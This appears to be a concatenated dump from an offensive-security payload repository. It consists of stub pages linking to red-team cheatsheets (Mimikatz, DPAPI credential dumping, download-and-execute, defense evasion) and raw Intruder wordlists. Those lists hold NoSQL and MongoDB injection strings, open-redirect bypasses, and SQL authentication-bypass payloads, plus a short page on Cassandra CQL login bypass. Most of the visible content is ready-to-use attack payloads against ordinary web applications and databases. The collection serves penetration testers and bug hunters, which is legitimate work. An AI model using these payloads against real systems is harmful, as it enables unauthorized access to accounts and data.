 3 | :warning: Content of this page has been moved to [InternalAllTheThings/methodology/bug-hunting-methodology](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/)
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Passive Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#passive-recon)
 8 |     - Shodan
 9 |     - Wayback Machine
10 |     - The Harvester
11 |     - Github OSINT
12 | 
13 | - [Active Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#active-recon)
14 |     - [Network discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#network-discovery)
15 |     - [Web discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#web-discovery)
16 | 
17 | - [Web Vulnerabilities](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#looking-for-web-vulnerabilities)
18 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Network Discovery.md:
--------------------------------------------------------------------------------
 1 | # Network Discovery
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/network-discovery](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/)
 4 | 
 5 | - [Nmap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#nmap)
 6 | - [Network Scan with nc and ping](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#network-scan-with-nc-and-ping)
 7 | - [Spyse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#spyse)
 8 | - [Masscan](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#masscan)
 9 | - [Netdiscover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#netdiscover)
10 | - [Responder](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#responder)
11 | - [Bettercap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#bettercap)
12 | - [Reconnoitre](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#reconnoitre)
13 | - [SSL MITM with OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#ssl-mitm-with-openssl)
14 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#references)
15 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Powershell - Cheatsheet.md:
--------------------------------------------------------------------------------
 1 | # Powershell
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/)
 4 | 
 5 | - [Execution Policy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#execution-policy)
 6 | - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
 7 | - [Constrained Mode](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#constrained-mode)
 8 | - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
 9 | - [Download file](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#download-file)
10 | - [Load Powershell scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-powershell-scripts)
11 | - [Load Chttps://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/# assembly reflectively](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively)
12 | - [Call Win API using delegate functions with Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#call-win-api-using-delegate-functions-with-reflection)
13 |     - [Resolve address functions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#resolve-address-functions)
14 |     - [DelegateType Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#delegatetype-reflection)
15 |     - [Example with a simple shellcode runner](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#example-with-a-simple-shellcode-runner)
16 | - [Secure String to Plaintext](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#secure-string-to-plaintext)
17 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#references)
18 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Source Code Management.md:
--------------------------------------------------------------------------------
 1 | # Source Code Management & CI/CD Compromise
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/source-code-management-ci](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/)
 4 | 
 5 | - [CI/CD Attacks](https://swisskyrepo.github.io/InternalAllTheThings/devops/)
 6 |     - [Azure DevOps](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-azure-devops/)
 7 |     - [BuildKite](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-buildkite/)
 8 |     - [CircleCI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-circle-ci/)
 9 |     - [Drone CI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-drone-ci/)
10 |     - [GitHub Actions](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-github-actions/)
11 |     - [Gitlab CI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-gitlab-ci/)
12 | - [Package Managers and Build Files](https://swisskyrepo.github.io/InternalAllTheThings/devops/package-managers/)
13 | - [Hardcoded Secrets Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/devops/secrets-enumeration/)
14 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Vulnerability Reports.md:
--------------------------------------------------------------------------------
 1 | # Vulnerability Reports
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/methodology/vulnerability-reports](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/)
 4 | 
 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#tools)
 6 | - [Vulnerability Report Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-report-structure)
 7 | - [Vulnerability Details Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-details-structure)
 8 | - [General Guidelines](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#general-guidelines)
 9 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#references)
10 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Web Attack Surface.md:
--------------------------------------------------------------------------------
 1 | # Subdomains Enumeration
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/web-attack-surface](https://github.com/swisskyrepo/InternalAllTheThings/redteam/access/web-attack-surface)
 4 | 
 5 | - [Enumerate Subdomains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#enumerate-subdomains)
 6 |     - [Subdomains Databases](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomains-databases)
 7 |     - [Bruteforce Subdomains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#bruteforce-subdomains)
 8 |     - [Certificate Transparency Logs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#certificate-transparency-logs)
 9 |     - [DNS Resolution](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#dns-resolution)
10 |     - [Technology Discovery](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#technology-discovery)
11 | - [Subdomain Takeover](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomain-takovers)
12 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#references)
13 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Windows - DPAPI.md:
--------------------------------------------------------------------------------
 1 | # Windows - DPAPI
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-dpapi](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/)
 4 | 
 5 | - [List Credential Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#list-credential-files)
 6 | - [DPAPI LocalMachine Context](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#dpapi-localmachine-context)
 7 | - [Mimikatz - Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#mimikatz---credential-manager--dpapi)
 8 | - [Hekatomb - Steal all credentials on domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#hekatomb---steal-all-credentials-on-domain)
 9 | - [DonPAPI - Dumping DPAPI credz remotely](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#donpapi---dumping-dpapi-credz-remotely)
10 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Windows - Defenses.md:
--------------------------------------------------------------------------------
 1 | # Windows - Defenses
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-defenses](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/)
 4 | 
 5 | - [AppLocker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#applocker)
 6 | - [User Account Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#user-account-control)
 7 | - [DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#dpapi)
 8 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#powershell)
 9 |     - [Anti Malware Scan Interface](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#anti-malware-scan-interface)
10 |     - [Just Enough Administration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#just-enough-administration)
11 |     - [Contrained Language Mode](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#constrained-language-mode)
12 |     - [Script Block Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#script-block-logging)
13 | - [Protected Process Light](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#protected-process-light)
14 | - [Credential Guard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#credential-guard)
15 | - [Event Tracing for Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#event-tracing-for-windows)
16 | - [Windows Defender Antivirus](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-antivirus)
17 | - [Windows Defender Application Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-application-control)
18 | - [Windows Defender Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-firewall)
19 | - [Windows Information Protection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-information-protection)
20 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Windows - Download and Execute.md:
--------------------------------------------------------------------------------
 1 | # Windows - Download and execute methods
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-download-execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/)
 4 | 
 5 | - [Downloaded files location](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#downloaded-files-location)
 6 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#powershell)
 7 | - [Cmd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cmd)
 8 | - [Cscript / Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cscript-wscript)
 9 | - [Mshta](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#mshta)
10 | - [Rundll32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#rundll32)
11 | - [Regasm / Regsvc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regasm-regsvc-subtee)
12 | - [Regsvr32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regsvr32)
13 | - [Odbcconf](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#odbcconf)
14 | - [Msbuild](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#msbuild)
15 | - [Certutil](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#certutil)
16 | - [Bitsadmin](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#bitsadmin)
17 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#references)
18 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Windows - Mimikatz.md:
--------------------------------------------------------------------------------
 1 | # Windows - Mimikatz
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/)
 4 | 
 5 | - [Execute commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#execute-commands)
 6 | - [Extract passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#extract-passwords)
 7 | - [LSA Protection Workaround](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround)
 8 | - [Mini Dump](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#mini-dump)
 9 | - [Pass The Hash](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#pass-the-hash)
10 | - [Golden ticket](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#golden-ticket)
11 | - [Skeleton key](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#skeleton-key)
12 | - [RDP Session Takeover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover)
13 | - [RDP Passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-passwords)
14 | - [Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#credential-manager--dpapi)
15 |     - [Chrome Cookies & Credential](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#chrome-cookies--credential)
16 |     - [Task Scheduled credentials](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#task-scheduled-credentials)
17 |     - [Vault](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#vault)
18 | - [Commands list](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#commands-list)
19 | - [Powershell version](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#powershell-version)
20 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#references)
21 | 


--------------------------------------------------------------------------------
/NoSQL Injection/Intruder/MongoDB.txt:
--------------------------------------------------------------------------------
 1 | true, $where: '1 == 1'
 2 | , $where: '1 == 1'
 3 | $where: '1 == 1'
 4 | ', $where: '1 == 1'
 5 | 1, $where: '1 == 1'
 6 | { $ne: 1 }
 7 | ', $or: [ {}, { 'a':'a
 8 | ' } ], $comment:'successful MongoDB injection'
 9 | db.injection.insert({success:1});
10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11 | || 1==1
12 | ' && this.password.match(/.*/)//+%00
13 | ' && this.passwordzz.match(/.*/)//+%00
14 | '%20%26%26%20this.password.match(/.*/)//+%00
15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00
16 | {$gt: ''}
17 | [$ne]=1
18 | ';return 'a'=='a' && ''=='
19 | ";return(true);var xyz='a
20 | 0;return true


--------------------------------------------------------------------------------
/NoSQL Injection/Intruder/NoSQL.txt:
--------------------------------------------------------------------------------
 1 | true, $where: '1 == 1'
 2 | , $where: '1 == 1'
 3 | $where: '1 == 1'
 4 | ', $where: '1 == 1'
 5 | 1, $where: '1 == 1'
 6 | { $ne: 1 }
 7 | ', $or: [ {}, { 'a':'a
 8 | ' } ], $comment:'successful MongoDB injection'
 9 | db.injection.insert({success:1});
10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11 | || 1==1
12 | ' && this.password.match(/.*/)//+%00
13 | ' && this.passwordzz.match(/.*/)//+%00
14 | '%20%26%26%20this.password.match(/.*/)//+%00
15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00
16 | {$gt: ''}
17 | {"$gt": ""}
18 | [$ne]=1
19 | ';sleep(5000);
20 | ';sleep(5000);'
21 | ';sleep(5000);+'
22 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
23 | ';return 'a'=='a' && ''=='
24 | ";return(true);var xyz='a
25 | 0;return true


--------------------------------------------------------------------------------
/Open Redirect/Intruder/open_redirect_wordlist.txt:
--------------------------------------------------------------------------------
 1 | /http://example.com
 2 | /%5cexample.com
 3 | /%2f%2fexample.com
 4 | /example.com/%2f%2e%2e
 5 | /http:/example.com
 6 | /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
 7 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
 8 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
 9 | /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
10 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
11 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com
12 | /.example.com
13 | ///\;@example.com
14 | ///example.com/
15 | ///example.com
16 | ///example.com/%2f..
17 | /////example.com/
18 | /////example.com


--------------------------------------------------------------------------------
/Open Redirect/Intruder/openredirects.txt:
--------------------------------------------------------------------------------
 1 | /%09/example.com
 2 | /%2f%2fexample.com
 3 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
 4 | /%5cexample.com
 5 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
 6 | /.example.com
 7 | //%09/example.com
 8 | //%5cexample.com
 9 | ///%09/example.com
10 | ///%5cexample.com
11 | ////%09/example.com
12 | ////%5cexample.com
13 | /////example.com
14 | /////example.com/
15 | ////\;@example.com
16 | ////example.com/
17 | ////example.com/%2e%2e
18 | ////example.com/%2e%2e%2f
19 | ////example.com/%2f%2e%2e
20 | ////example.com/%2f..
21 | ////example.com//
22 | ///\;@example.com
23 | ///example.com
24 | ///example.com/
25 | ///example.com/%2e%2e
26 | ///example.com/%2e%2e%2f
27 | ///example.com/%2f%2e%2e
28 | ///example.com/%2f..
29 | ///example.com//
30 | //example.com
31 | //example.com/
32 | //example.com/%2e%2e
33 | //example.com/%2e%2e%2f
34 | //example.com/%2f%2e%2e
35 | //example.com/%2f..
36 | //example.com//
37 | //google%00.com
38 | //google%E3%80%82com
39 | //https:///example.com/%2e%2e
40 | //https://example.com/%2e%2e%2f
41 | //https://example.com//
42 | /<>//example.com
43 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
44 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
45 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
46 | /\/\/example.com/
47 | /\/example.com/
48 | /example.com/%2f%2e%2e
49 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d
50 | /http://example.com
51 | /http:/example.com
52 | /https:/%5cexample.com/
53 | /https://%09/example.com
54 | /https://%5cexample.com
55 | /https:///example.com/%2e%2e
56 | /https:///example.com/%2f%2e%2e
57 | /https://example.com
58 | /https://example.com/
59 | /https://example.com/%2e%2e
60 | /https://example.com/%2e%2e%2f
61 | /https://example.com/%2f%2e%2e
62 | /https://example.com/%2f..
63 | /https://example.com//
64 | /https:example.com
65 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
66 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
67 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
68 | 


--------------------------------------------------------------------------------
/SAML Injection/Images/SAML-xml-flaw.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SAML Injection/Images/SAML-xml-flaw.png


--------------------------------------------------------------------------------
/SAML Injection/Images/XSLT1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SAML Injection/Images/XSLT1.jpg


--------------------------------------------------------------------------------
/SQL Injection/Cassandra Injection.md:
--------------------------------------------------------------------------------
 1 | # Cassandra Injection
 2 | 
 3 | > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [CQL Injection Limitations](#cql-injection-limitations)
 8 | * [Cassandra Comment](#cassandra-comment)
 9 | * [Cassandra Login Bypass](#cassandra-login-bypass)
10 |     * [Example #1](#example-1)
11 |     * [Example #2](#example-2)
12 | * [References](#references)
13 | 
14 | ## CQL Injection Limitations
15 | 
16 | * Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
17 | 
18 | * Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
19 | 
20 | * Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
21 | 
22 | * Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function.
23 | 
24 | * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
25 | 
26 | ## Cassandra Comment
27 | 
28 | ```sql
29 | /* Cassandra Comment */
30 | ```
31 | 
32 | ## Cassandra Login Bypass
33 | 
34 | ### Example #1
35 | 
36 | ```sql
37 | username: admin' ALLOW FILTERING; %00
38 | password: ANY
39 | ```
40 | 
41 | ### Example #2
42 | 
43 | ```sql
44 | username: admin'/*
45 | password: */and pass>'
46 | ```
47 | 
48 | The injection would look like the following SQL query
49 | 
50 | ```sql
51 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
52 | ```
53 | 
54 | ## References
55 | 
56 | * [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
57 | * [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
58 | 


--------------------------------------------------------------------------------
/SQL Injection/Images/PostgreSQL_cmd_exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Images/PostgreSQL_cmd_exec.png


--------------------------------------------------------------------------------
/SQL Injection/Images/Unicode_SQL_injection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Images/Unicode_SQL_injection.png


--------------------------------------------------------------------------------
/SQL Injection/Images/wildcard_underscore.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Images/wildcard_underscore.jpg


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass.txt:
--------------------------------------------------------------------------------
 1 | '-'
 2 | ' '
 3 | '&'
 4 | '^'
 5 | '*'
 6 | ' or ''-'
 7 | ' or '' '
 8 | ' or ''&'
 9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1' or 1.e(1) or '1'='1
78 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
79 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass2.txt:
--------------------------------------------------------------------------------
  1 | ==
  2 | =
  3 | '
  4 | ' --
  5 | ' #
  6 | ' –
  7 | '--
  8 | '/*
  9 | '#
 10 | " --
 11 | " #
 12 | "/*
 13 | ' and 1='1
 14 | ' and a='a
 15 |  or 1=1
 16 |  or true
 17 | ' or ''='
 18 | " or ""="
 19 | 1′) and '1′='1–
 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 22 |  and 1=1
 23 |  and 1=1–
 24 | ' and 'one'='one
 25 | ' and 'one'='one–
 26 | ' group by password having 1=1--
 27 | ' group by userid having 1=1--
 28 | ' group by username having 1=1--
 29 |  like '%'
 30 |  or 0=0 --
 31 |  or 0=0 #
 32 |  or 0=0 –
 33 | ' or         0=0 #
 34 | ' or 0=0 --
 35 | ' or 0=0 #
 36 | ' or 0=0 –
 37 | " or 0=0 --
 38 | " or 0=0 #
 39 | " or 0=0 –
 40 | %' or '0'='0
 41 |  or 1=1
 42 |  or 1=1--
 43 |  or 1=1/*
 44 |  or 1=1#
 45 |  or 1=1–
 46 | ' or 1=1--
 47 | ' or '1'='1
 48 | ' or '1'='1'--
 49 | ' or '1'='1'/*
 50 | ' or '1'='1'#
 51 | ' or '1′='1
 52 | ' or 1=1
 53 | ' or 1=1 --
 54 | ' or 1=1 –
 55 | ' or 1=1--
 56 | ' or 1=1;#
 57 | ' or 1=1/*
 58 | ' or 1=1#
 59 | ' or 1=1–
 60 | ') or '1'='1
 61 | ') or '1'='1--
 62 | ') or '1'='1'--
 63 | ') or '1'='1'/*
 64 | ') or '1'='1'#
 65 | ') or ('1'='1
 66 | ') or ('1'='1--
 67 | ') or ('1'='1'--
 68 | ') or ('1'='1'/*
 69 | ') or ('1'='1'#
 70 | 'or'1=1
 71 | 'or'1=1′
 72 | " or "1"="1
 73 | " or "1"="1"--
 74 | " or "1"="1"/*
 75 | " or "1"="1"#
 76 | " or 1=1
 77 | " or 1=1 --
 78 | " or 1=1 –
 79 | " or 1=1--
 80 | " or 1=1/*
 81 | " or 1=1#
 82 | " or 1=1–
 83 | ") or "1"="1
 84 | ") or "1"="1"--
 85 | ") or "1"="1"/*
 86 | ") or "1"="1"#
 87 | ") or ("1"="1
 88 | ") or ("1"="1"--
 89 | ") or ("1"="1"/*
 90 | ") or ("1"="1"#
 91 | ) or '1′='1–
 92 | ) or ('1′='1–
 93 | ' or 1=1 LIMIT 1;#
